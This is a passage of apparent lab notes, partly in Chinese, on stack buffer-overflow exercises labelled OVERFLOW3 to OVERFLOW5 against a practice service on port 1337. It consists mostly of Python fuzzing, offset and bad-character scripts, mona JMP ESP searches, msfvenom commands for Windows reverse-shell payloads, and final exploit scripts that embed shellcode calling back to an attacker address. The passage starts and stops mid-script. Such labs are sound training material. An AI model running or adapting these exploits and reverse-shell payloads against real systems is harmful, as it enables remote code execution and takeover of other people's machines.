Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 35714234 -> 5qB4 -> 4Bq5

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 4Bq5 -l 1300

[*] Exact match at offset 1274

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW3 "
offset = 1274
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW3 "
offset = 1274
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\x11\x12\x40\x41\x5f\x60\xb8\xb9\xee\xef

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW3 "
offset = 1274
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x10\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5e\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb7\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xed\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\x11\x40\x5f\xb8\xee之后\x12\x41\x60\xb9\xef不受影响

BADCHAR: \x00\x11\x40\x5f\xb8\xee

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\x11\x40\x5f\xb8\xee"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\x11\x40\x5f\xb8\xee" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW3 "
offset = 1274
overflow = "A" * offset
retn = "\x03\x12\x50\x62"
padding = "\x90" * 16
payload = "\xfc\xbb\x86\xb5\xc7\xaf\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x7a\x5d\x45\xaf\x82\x9e\x2a\x39\x67\xaf\x6a\x5d\xec\x80\x5a\x15\xa0\x2c\x10\x7b\x50\xa6\x54\x54\x57\x0f\xd2\x82\x56\x90\x4f\xf6\xf9\x12\x92\x2b\xd9\x2b\x5d\x3e\x18\x6b\x80\xb3\x48\x24\xce\x66\x7c\x41\x9a\xba\xf7\x19\x0a\xbb\xe4\xea\x2d\xea\xbb\x61\x74\x2c\x3a\xa5\x0c\x65\x24\xaa\x29\x3f\xdf\x18\xc5\xbe\x09\x51\x26\x6c\x74\x5d\xd5\x6c\xb1\x5a\x06\x1b\xcb\x98\xbb\x1c\x08\xe2\x67\xa8\x8a\x44\xe3\x0a\x76\x74\x20\xcc\xfd\x7a\x8d\x9a\x59\x9f\x10\x4e\xd2\x9b\x99\x71\x34\x2a\xd9\x55\x90\x76\xb9\xf4\x81\xd2\x6c\x08\xd1\xbc\xd1\xac\x9a\x51\x05\xdd\xc1\x3d\xea\xec\xf9\xbd\x64\x66\x8a\x8f\x2b\xdc\x04\xbc\xa4\xfa\xd3\xc3\x9e\xbb\x4b\x3a\x21\xbc\x42\xf9\x75\xec\xfc\x28\xf6\x67\xfc\xd5\x23\x27\xac\x79\x9c\x88\x1c\x3a\x4c\x61\x76\xb5\xb3\x91\x79\x1f\xdc\x38\x80\xc8\xe9\xad\xa0\x68\x86\xcf\xb4\x6d\x6f\x59\x52\x07\x9f\x0f\xcd\xb0\x06\x0a\x85\x21\xc6\x80\xe0\x62\x4c\x27\x15\x2c\xa5\x42\x05\xd9\x45\x19\x77\x4c\x59\xb7\x1f\x12\xc8\x5c\xdf\x5d\xf1\xca\x88\x0a\xc7\x02\x5c\xa7\x7e\xbd\x42\x3a\xe6\x86\xc6\xe1\xdb\x09\xc7\x64\x67\x2e\xd7\xb0\x68\x6a\x83\x6c\x3f\x24\x7d\xcb\xe9\x86\xd7\x85\x46\x41\xbf\x50\xa5\x52\xb9\x5c\xe0\x24\x25\xec\x5d\x71\x5a\xc1\x09\x75\x23\x3f\xaa\x7a\xfe\xfb\xda\x30\xa2\xaa\x72\x9d\x37\xef\x1e\x1e\xe2\x2c\x27\x9d\x06\xcd\xdc\xbd\x63\xc8\x99\x79\x98\xa0\xb2\xef\x9e\x17\xb2\x25\x9e\x97\x4c\xc6"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

BADCHAR也不能在EIP中出现

OVERFLOW4

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW4 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 2100 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW4 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 70433570 -> pC5p -> p5Cp

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q p5Cp -l 2100

[*] Exact match at offset 2026

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.

BADCHAR: \x00\xa9\xaa\xcd\xce\xd4\xd5

#!/usr/bin/env python3
# badchar_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa8\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcc\xce\xcf\xd0\xd1\xd2\xd3\xd3\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

去掉BADCHAR\xa9\xcd\xd4之后\xaa\xce\xd5不受影响

BADCHAR: \x00\xa9\xcd\xd4

JMP ESP

Immunity Debugger

!mona jmp -r esp -cqb "\x00\xa9\xcd\xd4"

0x625011af
0x625011bb
0x625011c7
0x625011d3
0x625011df
0x625011eb
0x625011f7
0x62501203
0x62501205

SHELLCODE

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.42.96 LPORT=1337 -b "\x00\xa9\xcd\xd4" -f c

EXPLOIT

#!/usr/bin/env python3
# exploit.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = "\xda\xd5\xb8\x1a\x41\xb8\x79\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x52\x31\x43\x17\x83\xeb\xfc\x03\x59\x52\x5a\x8c\xa1\xbc\x18\x6f\x59\x3d\x7d\xf9\xbc\x0c\xbd\x9d\xb5\x3f\x0d\xd5\x9b\xb3\xe6\xbb\x0f\x47\x8a\x13\x20\xe0\x21\x42\x0f\xf1\x1a\xb6\x0e\x71\x61\xeb\xf0\x48\xaa\xfe\xf1\x8d\xd7\xf3\xa3\x46\x93\xa6\x53\xe2\xe9\x7a\xd8\xb8\xfc\xfa\x3d\x08\xfe\x2b\x90\x02\x59\xec\x13\xc6\xd1\xa5\x0b\x0b\xdf\x7c\xa0\xff\xab\x7e\x60\xce\x54\x2c\x4d\xfe\xa6\x2c\x8a\x39\x59\x5b\xe2\x39\xe4\x5c\x31\x43\x32\xe8\xa1\xe3\xb1\x4a\x0d\x15\x15\x0c\xc6\x19\xd2\x5a\x80\x3d\xe5\x8f\xbb\x3a\x6e\x2e\x6b\xcb\x34\x15\xaf\x97\xef\x34\xf6\x7d\x41\x48\xe8\xdd\x3e\xec\x63\xf3\x2b\x9d\x2e\x9c\x98\xac\xd0\x5c\xb7\xa7\xa3\x6e\x18\x1c\x2b\xc3\xd1\xba\xac\x24\xc8\x7b\x22\xdb\xf3\x7b\x6b\x18\xa7\x2b\x03\x89\xc8\xa7\xd3\x36\x1d\x67\x83\x98\xce\xc8\x73\x59\xbf\xa0\x99\x56\xe0\xd1\xa2\xbc\x89\x78\x59\x57\xbc\x6d\x4b\xc7\xa8\x8f\x8b\x02\x10\x19\x6d\x66\x72\x4f\x26\x1f\xeb\xca\xbc\xbe\xf4\xc0\xb9\x81\x7f\xe7\x3e\x4f\x88\x82\x2c\x38\x78\xd9\x0e\xef\x87\xf7\x26\x73\x15\x9c\xb6\xfa\x06\x0b\xe1\xab\xf9\x42\x67\x46\xa3\xfc\x95\x9b\x35\xc6\x1d\x40\x86\xc9\x9c\x05\xb2\xed\x8e\xd3\x3b\xaa\xfa\x8b\x6d\x64\x54\x6a\xc4\xc6\x0e\x24\xbb\x80\xc6\xb1\xf7\x12\x90\xbd\xdd\xe4\x7c\x0f\x88\xb0\x83\xa0\x5c\x35\xfc\xdc\xfc\xba\xd7\x64\x0c\xf1\x75\xcc\x85\x5c\xec\x4c\xc8\x5e\xdb\x93\xf5\xdc\xe9\x6b\x02\xfc\x98\x6e\x4e\xba\x71\x03\xdf\x2f\x75\xb0\xe0\x65"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

OVERFLOW5

FUZZ

#!/usr/bin/env python3
# fuzz.py
import socket, time, sys

ip = "10.10.90.129"

port = 1337
timeout = 5
prefix = "OVERFLOW5 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)

Fuzzing crashed at 400 bytes

OFFSET

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 400

#!/usr/bin/env python3
# offset.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW5 "
offset = 0
overflow = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 35614134 -> 5kA4 -> 4Ak5

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 4Ak5 -l 400

[*] Exact match at offset 314

#!/usr/bin/env python3
# offset_confirm.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW5 "
offset = 314
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((ip, port))
	print("Sending evil buffer...")
	s.send(bytes(buffer + "\r\n", "latin-1"))
	print("Done!")
except:
	print("Could not connect.")

EIP: 42424242 -> BBBB

BADCHAR

#!/usr/bin/env python3
# charset.py
for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')
print()

#!/usr/bin/env python3
# badchar.py
import socket

ip = "10.10.90.129"
port = 1337

prefix = "OVERFLOW5 "
offset = 314
overflow = "A" * offset
retn = "BBBB"
padding = ""
